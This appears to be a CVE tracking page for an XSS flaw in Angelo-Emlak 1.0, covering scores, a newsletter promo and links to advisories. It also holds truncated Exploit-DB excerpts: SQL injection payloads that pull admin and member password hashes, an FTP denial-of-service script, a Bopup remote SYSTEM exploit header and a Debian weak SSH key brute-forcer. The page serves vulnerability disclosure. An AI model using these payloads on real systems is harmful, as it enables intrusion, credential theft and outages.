CVE-2008-2048
published 2008-05-01CVE-2008-2048: Cross-site scripting (XSS) vulnerability in hpz/admin/Default.asp in Angelo-Emlak 1.0 allows remote attackers to inject arbitrary web script or HTML via the…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.57%
72.3th percentile
Cross-site scripting (XSS) vulnerability in hpz/admin/Default.asp in Angelo-Emlak 1.0 allows remote attackers to inject arbitrary web script or HTML via the sayfa parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aspindir | angelo-emlak | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Bopup Communications Server 3.2.26.5460 - Remote SYSTEM
exploitdb·2009-06-22
CVE-2009-2227 Bopup Communications Server 3.2.26.5460 - Remote SYSTEM
Bopup Communications Server 3.2.26.5460 - Remote SYSTEM
---
/* bopup-down.c
*
* Copyright (c) 2008 by
*
* Bopup Communications Server remote SYSTEM exploit
* by mu-b - Sat Feb 08 2008
*
* - Tested on: Bopup Communications Server 3.2.26.5460 (Mar 18 2009)
*
* .text:00407A17 lea eax, [ebp+pkt_0x19]
* .text:00407A1D push eax
* .text:00407A1E lea eax, [ebp+var_354]
* .text:00407A24 push eax
* .text:00407A25 call _strcpy
*
* note: this is updated over time for newer versions, I can't be bothered
* making it universal nor anything else...
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include
#include
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BOPUP_STR_OFFSET 0x19
#define BOPUP_STR_LEN 0x348+8
#define
Exploit-DB
MyTopix 1.3.0 - SQL Injection
exploitdb·2008-11-19
CVE-2008-6330 MyTopix 1.3.0 - SQL Injection
MyTopix 1.3.0 - SQL Injection
---
evil = '';
$this -> socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$this -> inj = '-1+UNION+SELECT+concat(members_name,0x3a,members_pass)+FROM+my_members+WHERE+members_id=2--';
}
private function send($packet)
{
if(!$this -> socket) $this -> socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($this -> socket, gethostbyname($this -> host), 80) or die("[-] Couldn't connect with specified host\r\n");
socket_write($this -> socket, $packet, strlen($packet)) or die("[-] Couldn't send requrested packet\r\n");
while($resp = socket_read($this -> socket, 2048)) $output .= $resp;
socket_shutdown($this -> socket, 2);
socket_close($this -> socket);
unset($this -> socket);
return $output;
}
public function target($host, $path)
{
$this -
Exploit-DB
RaidenFTPd 2.4 build 3620 - Remote Denial of Service
exploitdb·2008-10-13
CVE-2008-6186 RaidenFTPd 2.4 build 3620 - Remote Denial of Service
RaidenFTPd 2.4 build 3620 - Remote Denial of Service
---
# RaidenFTPD V2.4 build 3620 exploit
# probaly heap overflow
#
# (x)dmnt 2008
# -*- coding: windows-1252 -*-
import socket
import sys, time
evil_cwd = "/"+"\x22"*255
evil_dir = "X"*505
def help_info():
print ("Usage: ShaoKahn \n")
print ("Note: anonymous is enought")
def dos_it(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(2048)
print "[+] Connected"
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
time.sleep(3)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] Send evil string"
time.sleep(3)
sock.send("cwd %s\r\n" %evil_cwd)
r=sock.recv(1024)
time.sleep(3)
sock.send("mlst %s\
Exploit-DB
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)
exploitdb·2008-05-16
CVE-2008-0166 OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)
OpenSSL 0.9.8c-1
#
# This tool helps to find user accounts with weak SSH keys
# that should be regenerated with an unaffected version
# of openssl.
#
# You will need the precalculated keys provided by HD Moore
# See http://metasploit.com/users/hdm/tools/debian-openssl/
# for further information.
#
# Common Keys:
#
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
#
# Usage:
# debian_openssh_key_test.rb
#
# E-DB Note: See here for an update ~ https://github.com/offensive-security/exploitdb/pull/76/files
#
require 'thread'
THREADCOUNT = 10
KEYSPERCONNECT = 3
queue = Queue.new
thre
Exploit-DB
Angelo-Emlak 1.0 - Multiple SQL Injections
exploitdb·2008-04-26
CVE-2008-2048 Angelo-Emlak 1.0 - Multiple SQL Injections
Angelo-Emlak 1.0 - Multiple SQL Injections
---
Angelo-Emlak v1.0 Multiple Remote SQL injection Vulnerable
Discovered By : U238
msn :setuid.noexec0x1[+]hotmail[-].com
webPage :http://noexec.blogspot.com
Script : http://www.aspdepo.org/tr/incele.asp?id=587&Script=angelo-emlak-v1.0-(tr)
Script2 : http://rapidshare.de/files/39240819/angelo-emlak_v1.0.zip.html
not : Siz0yyffyeniz biz kardesim inkar edenmı var ya :( - Allah .belanı versin ulan $iz0 .buda yılın sozu :D
Exploit:
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/profil.asp?id=1+union+select+0,1,2,3,(user),(pass),1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin+where+id=1
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+user,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
No writeups or analysis indexed.
http://secunia.com/advisories/29998http://www.securityfocus.com/bid/28949http://www.vupen.com/english/advisories/2008/1385https://exchange.xforce.ibmcloud.com/vulnerabilities/42155https://www.exploit-db.com/exploits/5503http://secunia.com/advisories/29998http://www.securityfocus.com/bid/28949http://www.vupen.com/english/advisories/2008/1385https://exchange.xforce.ibmcloud.com/vulnerabilities/42155https://www.exploit-db.com/exploits/5503
2008-05-01
Published